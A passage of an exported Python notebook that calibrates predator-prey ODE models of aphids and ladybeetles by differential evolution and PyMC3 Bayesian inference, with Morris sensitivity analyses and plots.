# In[106]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP3.png", dpi=300)
plt.show()
# In[107]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[108]:
# Wrap the CP3 ODE solve as a Theano op so PyMC3 can place it inside a
# model graph. The positional argument order of the wrapped function must
# match the itypes list below exactly.
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar, # r1
        t.dscalar, # a1
        t.dscalar, # a2
        t.dscalar, # a3
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def CP3_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
    """Solve the CP3 system on `time_exp` and return a matrix whose two
    columns are the simulated population trajectories (time along rows)."""
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1, a2, a3]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        CP3_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack the two state trajectories as columns for the dmatrix output.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[109]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_CP3:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 100 * percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 100 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP3_model",
CP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
# Multi-Level Delayed Acceptance MCMC: the coarse (subsampled-data) model
# pre-screens proposals before the fine model evaluates them.
# NOTE(review): coarse_model_2 is defined above but not passed to MLDA,
# and the earlier `draws = 1000` assignment is superseded by draws=4500.
with fine_model_CP3:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_CP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[110]:
plt.hist(trace_calibration_CP3['a1'], bins=35)
plt.show()
# In[111]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[112]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_CP3[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_CP3.png")
# In[113]:
az.plot_pair(
trace_calibration_CP3,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP3.png")
# In[114]:
df_stats_summary = az.summary(
data=trace_calibration_CP3,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[115]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Map each posterior variable to its KDE-based most probable value.

    Vector-valued variables produce one entry per component, keyed
    "name[component]"; scalar variables a single entry under their name.
    """
    results = dict()
    description_bar = tqdm(variable_names)
    for name in description_bar:
        description_bar.set_description(f"Calculating MPV from KDE for {name}")
        samples = pm_trace[f"{name}"]
        # 1-D samples have no second axis; treat them as scalar variables.
        try:
            n_components = samples.shape[1]
        except IndexError:
            n_components = 0
        if n_components == 0:
            results[f"{name}"] = _scalar_rv_mvp_estimation(samples)
            continue
        for component in range(n_components):
            column = np.array(samples[:, component])
            results[f"{name}[{component}]"] = _scalar_rv_mvp_estimation(column)
    return results
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Append the most-probable-value column ('mpv') to an ArviZ summary copy."""
    augmented = arviz_summary.copy()
    names = list(rv_modes_dict.keys())
    modes = list(rv_modes_dict.values())
    augmented["mpv"] = pd.Series(data=modes, index=names)
    return augmented
# In[116]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_CP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[117]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP3["CP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP3["CP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP3["CP3_model"], 50, axis=0)
# In[118]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP3.png", dpi=300)
plt.show()
# In[119]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_CP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[120]:
df_realizations
# # Exponential Prey Growth FR1 model
# In[121]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def EP1_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
):
    """RHS of the EP1 system: exponential prey growth with a Holling
    type-I (linear) predation term and a static predator population."""
    prey, predator = X
    prey_rate = r1 * prey - a1 * prey * predator
    predator_rate = 0
    return prey_rate, predator_rate
def EP1_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
):
    """Integrate the EP1 system with LSODA and return the scipy solution object."""
    return solve_ivp(
        fun=EP1_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, a1),
        method="LSODA",
    )
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[122]:
def EP1_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Least-squares residual between an EP1 simulation and observed data.

    Parameters
    ----------
    par : sequence
        Model parameters forwarded to ``fitting_model``.
    time_exp : np.ndarray
        Observation times; also used as the solver evaluation grid.
    f_exp : sequence of two arrays
        Observed densities for the two populations.
    fitting_model : callable
        Solver with signature ``(y0, t_span, t_eval, *par)`` returning an
        object with a ``.y`` attribute of two trajectories.
    initial_conditions : sequence
        Initial populations (u0, v0).

    Returns
    -------
    float
        Mean weighted sum of squared residuals, or 1e15 when the solver
        output cannot be compared with the data (ValueError).
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    # Both populations currently weighted equally in the objective.
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Solver failure or shape mismatch (e.g. integration stopped early):
        # penalize heavily so the optimizer moves away from this region.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Report the differential-evolution optimizer's current best parameter
    vector after each generation (progress display only)."""
    print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[123]:
from scipy import optimize
seed = 1234
r1=0.0025591841125063588
a1=0.005814656330586127
denom_min = 0.1
denom_max = 1.9
bounds_EP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_EP1 = optimize.differential_evolution(
EP1_least_squares_error_ode,
bounds=bounds_EP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
EP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_EP1)
# * Retrieving the calibrated parameter values:
# In[124]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
) = result_EP1.x
solution_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_EP1.x
)
t_computed_EP1, y_computed_EP1 = solution_ODE_EP1.t, solution_ODE_EP1.y
u_EP1, v_EP1 = y_computed_EP1
parameters_dict = {
"Model": "EP1",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[125]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP1, u_EP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP1, v_EP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[126]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[127]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = EP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
EP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[128]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[129]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[130]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[131]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[132]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Time-resolved Morris analysis: one ee_analyze() call per output time point.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize mu* and sigma so the stacked bars sum to 1 per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Skip time points where the Morris analysis fails (e.g. zero output
        # variance); rows left as NaN are dropped afterwards.
        # NOTE(review): was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[133]:
df_sigmai
# In[134]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP1.png", dpi=300)
plt.show()
# In[135]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[136]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the prey time derivative along a precomputed trajectory.

    For each time point, the stacked state [u, v] is fed back into
    *ode_model* and the first component of the returned derivative
    (the prey equation) is collected.

    Returns a numpy array of du/dt samples, one per entry of *time_array*.
    """
    derivative_samples = []
    for t_idx, current_time in enumerate(time_array):
        stacked_state = [u_array[t_idx], v_array[t_idx]]
        du_dt, _ = ode_model(current_time, stacked_state, *model_pars)
        derivative_samples.append(du_dt)
    return np.array(derivative_samples)
# In[137]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_EP1,
u_EP1,
v_EP1,
EP1_model,
mean_values_params
)
pest_time_derivative_array
# In[138]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP1, u_EP1, '-x', label='Pest population')
plt.plot(t_computed_EP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP1.png", dpi=300)
plt.show()
# In[139]:
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[140]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP1 = EP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
EP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[141]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
# Time-resolved Morris analysis of the pest time derivative QoI.
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        # Normalize mu* and sigma so the stacked bars sum to 1 per time point.
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Skip time points where the Morris analysis fails (e.g. zero output
        # variance); rows left as NaN are dropped afterwards.
        # NOTE(review): was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[142]:
df_sigmai
# In[143]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP1.png", dpi=300)
plt.show()
# In[144]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[145]:
# Wrap the EP1 ODE solve as a Theano op so PyMC3 can evaluate it inside the
# probabilistic model graph. No gradient is defined, so this works only
# with gradient-free samplers (as used below).
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar, # r1
        t.dscalar, # a1
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def EP1_ode_wrapper(time_exp, r1, a1, u0, v0):
    """Solve the EP1 system at the experimental time points.

    Returns an (n_times, 2) array with the two solution components
    stacked column-wise, matching the layout of the observation matrix.
    """
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        EP1_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Transpose so rows are time points and columns the two QoIs.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[146]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_EP1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
